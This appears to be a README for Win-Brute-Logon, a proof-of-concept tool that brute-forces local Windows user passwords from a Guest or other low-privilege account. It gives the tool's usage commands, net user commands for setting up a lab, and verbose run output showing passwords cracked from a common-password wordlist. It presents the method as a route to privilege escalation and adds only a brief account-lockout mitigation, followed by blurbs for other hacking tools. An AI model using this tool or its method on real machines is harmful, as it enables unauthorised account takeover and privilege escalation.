Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability.
The biggest issue is related to the lack of privilege required to perform such actions.
Indeed, from a Guest account (The most limited account on Microsoft Windows), you can crack the password of any available local users.
Find out which users exists using command : net user
This PoC is using multithreading to speed up the process and support both 32 and 64bit.
WinBruteLogon.exe -u <username> -w <wordlist_file>
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Tested on Windows 10
Install and configure a freshly updated Windows 10 virtual or physical machine.
In my case full Windows version was : 1909 (OS Build 18363.778)
Log as administrator and lets create two different accounts : one administrator and one regular user. Both users are local.
/!\ Important notice: I used the Guest account for the demo but this PoC is not only limited to Guest account, it will work from any account / group (guest user / regular user / admin user etc…)
net user darkcodersc /add
net user darkcodersc trousers
(trousers is the password)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm
(ozlq6qwm is the password)
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
In my case both trousers
and ozlq6qwm
are in SecList : https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Logoff from administrator account or restart your machine and log to the Guest account.
Place the PoC executable anywhere you have access as Guest user.
Usage : WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v
is optional, it design the verbose mode.
By default, domain name is the value designated by %USERDOMAIN%
env var. You can specify a custom name with option -d
darkcodersc
(Administrator)prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=2260, handle=364
[INFO] New “TWorker” Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=2260, handle=364) Thread successfully terminated.
[INFO] “TWorkers”(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
HackMe
(Regular User)prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=5748, handle=336
[INFO] New “TWorker” Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=5748, handle=336) Thread successfully terminated.
[INFO] “TWorkers”(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
If you gain access to a low privileged user, you could crack the password of a more privileged user and escalate your privilege.
Open secpol.msc
then go to Account Policies
> Account Lockout Policy
and edit value Account lockout threshold
with desired value from (1 to 999).
Value represent the number of possible attempt before getting locked.
/!\ LockDown Policy wont work on Administrator account. At this moment, best protection for Administrator account (if Enabled) is to setup a very complex password.
This repository contains tools created by yogSahare0 while learning Python 3 for ethical hacking and penetration testing.…
"NetSecChallenger" provides a suite of automated tools designed for security professionals and network administrators to…
The essential tool for cybersecurity enthusiasts! This guide provides a detailed walkthrough on how to…
Meet "Poodone," the ultimate Python script designed for cybersecurity enthusiasts and professionals alike. Packed with…
The Linux version is no longer supported! The last Linux version is 6.0 that you…
Jin is a hacking command-line tools designed to make your scan port, gathering urls, check…